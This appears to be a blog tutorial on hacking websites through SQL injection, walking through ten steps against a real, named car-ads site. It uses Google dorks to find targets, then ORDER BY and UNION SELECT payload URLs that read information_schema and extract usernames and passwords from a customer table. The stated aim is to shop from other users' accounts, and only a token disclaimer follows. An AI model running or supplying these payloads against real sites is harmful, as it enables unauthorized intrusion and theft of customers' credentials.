hacking a website in ten steps
My this Section will include how to actually hack a website.
to find a website with the url ending with
.php?id=4383
where 4383 can be any number . Now in google i have some tricks where you can actually look for some sites ending with this tag.
use these following commands in google .
use these following commands in google .
inurl:shop.php?id=
inurl:shopping.php?id=
inurl:sell.php?id=
Now once you get any website with this url , open that website . For demonstration i am taking a website
http://pkmotors.com/ads_detail.php?nAddsID=17156%27
Step 2
Add ‘ after id=****
Now, if u are getting an error or a blank page after addition of ‘ then site is accepting sql commands from address bar of browser , which means site is vulnerable to sql injection.
Now, if u are getting an error or a blank page after addition of ‘ then site is accepting sql commands from address bar of browser , which means site is vulnerable to sql injection.
http://pkmotors.com/ads_detail.php?nAddsID=17156%27′
Step 3
Now next step is to find out number of vulnerable links
example – id=43434′ order by 1 –
check the number of vulnurable links by putting values 1,2,3,4 etc.. till wich the page does not gives error.
example – id=43434′ order by 1 –
check the number of vulnurable links by putting values 1,2,3,4 etc.. till wich the page does not gives error.
http://pkmotors.com/ads_detail.php?nAddsID=17156%27 order by 1 / order by 2 / etc until it comes blank
Step 4
Find out names of tables and columns
http://pkmotors.com/ads_detail.php?nAddsID=-17156%27 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 –
Step 5
Now what next we have to do is
replace the upper link with -17156′ union all select table_name,*,*,*,* from information_schema.tables –
replace the upper link with -17156′ union all select table_name,*,*,*,* from information_schema.tables –
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name%20from%20information_schema.tables%20–
Step 6
here group concat will give the details of all the tables in the database of the website
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28table_name%29%20from%20information_schema.tables%20%20–
Step 7
But since we are hacker :p , we are always interested in one table and that is the admin table so , look out for admin table in the list of displayed table names. Now here we chose the customer table because this is a shopping website and we want to shop from a user’s account so we will search for columns in the customer table by the following commands below
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27customer%27%20–
Step 8
same extracting information of every column of that table via group concat
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115,116,111,109,101,114%29%20–
Step 9
Now we get two column fields after executing the upper commands , that is
strUsername
strPassword
strUsername
strPassword
Now the limit fun. below will search for the username of the particular person with the id=1684
// here %20 in the url is not any command , it comes automatically once we execute our commands on the browser
// here %20 in the url is not any command , it comes automatically once we execute our commands on the browser
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strUsername%20from%20customer%20limit%201684,1%20–
Step 10
we finally got the username of the person and now we will look for the password of that person typing the same command and replacing strPassword with strUsername.
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strPassword%20from%20customer%20limit%201684,1%20–
Finally you have the username and the password of the person of your wish , now do what ever you want to do )
NOTE : These all steps of Hacking are just meant to teach how sql Injection can be done, no illegal work should be done from the above skills.
